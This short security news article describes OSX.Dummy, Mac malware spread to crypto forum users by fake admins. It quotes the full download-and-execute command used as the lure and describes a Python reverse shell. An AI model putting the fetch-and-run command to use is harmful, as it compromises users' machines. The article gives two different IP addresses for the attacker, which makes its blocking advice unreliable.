OSX.Dummy: Mac Malware Targets Crypto-Community Forums
Attackers posing as admins are asking users from crypto-community channel forums of Slack and Discord to infect themselves with malware through the use of simple, and rather dumb, social engineering tactics. Mac researchers agreed naming the malware OSX.Dummy, for a reason.
The following command was shared to unknowing crypto forums:
“$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script”
If this obviously sketchy line of code managed to trick someone by typing them via terminal command, a huge 34 MB of malicious binary will be downloaded and executed. The rather massive size was influenced by a multitude of OpenSSL and V8 libraries that’re seem to be compiled within.
What happens next? First the malware gives root the permission access on the malicious script. By doing this, the victim will be required to enter the password in the terminal. The password, then, gets saved by the malware to “/tmp/dumpdummy“.
After finally reaching the victim’s root, it creates a reverse shell script file and launch a persistent Daemon program so it won’t stop running and activating. Basically, a reverse shell is a method in which the victim communicates back to the attacker to offer admin access and streamline a solid connection between the two.
In this case, the malicious reverse shell script file uses Python programming language to open a reverse shell connection to 22.214.171.124, on Port 1337. If this succeeds, it’ll be easy for the attacker to control the victim’s PC (with root access) and execute admin commands.
As OSX.Dummy is only shared within crypto-community forums, one can simply deduce that its makers intended theft of crypto-currency.
To negate this malware altogether though, is as simple (but effective) as blocking off 126.96.36.199 – the particular IP address to which the shell script is maliciously communicating with.